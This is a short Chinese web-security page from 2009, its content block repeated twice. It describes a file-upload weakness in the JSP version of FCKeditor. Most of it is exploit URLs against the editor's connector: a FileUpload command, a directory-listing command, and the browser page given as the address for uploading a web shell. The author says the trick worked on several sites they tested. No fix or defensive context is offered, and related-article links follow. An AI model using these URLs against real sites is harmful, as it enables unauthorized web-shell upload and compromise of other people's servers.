FCKeditor JSP版漏洞
时间:2009-03-23 11:48:07 魔新豆网
FCKeditor的JSP版漏洞
http://www.xxx.com/fckeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=FileUpload&Type=Image&CurrentFolder=%2F
http://www.xxx.com/fckeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=%2F
上传shell的地址:
http://www.xxx.com/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector
跟版本有关系.并不是百分百成功. 测试成功几个站.
不能通杀.很遗憾.
http://www.xxx.com/fckeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=FileUpload&Type=Image&CurrentFolder=%2F
http://www.xxx.com/fckeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=%2F
上传shell的地址:
http://www.xxx.com/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector
跟版本有关系.并不是百分百成功. 测试成功几个站.
不能通杀.很遗憾.
本文标签:
- 上一篇:木马连接原理
- 下一篇:弹窗口的流氓软件核心代码
读过此篇文章的网友还读过:
- 视频:苹果OS X系统再曝新漏洞,用户信息唾手可得
- 容易被黑客攻击的10个漏洞
- Dedecms最新注入漏洞分析及修复方法
- php包含漏洞替代技术的方法与介绍 php文件包含漏洞详解
- php intval()函数使用不当的安全漏洞分析
- BOSSI 公司企业网站管理系统注入&上传漏洞利用
- 万博企业网站管理系统注入漏洞(MemberLogin.asp)
- dedecms v5.6 GBK 注入漏洞利用(member/index.php)
- PHP 双字节、宽字节编码漏洞
- 微软全系统建立隐藏账户漏洞分析
- Kindeditor特定情况可能会导致全盘浏览的漏洞
- 互联网心脏出血漏洞怎么修复? 心脏出血漏洞修复教程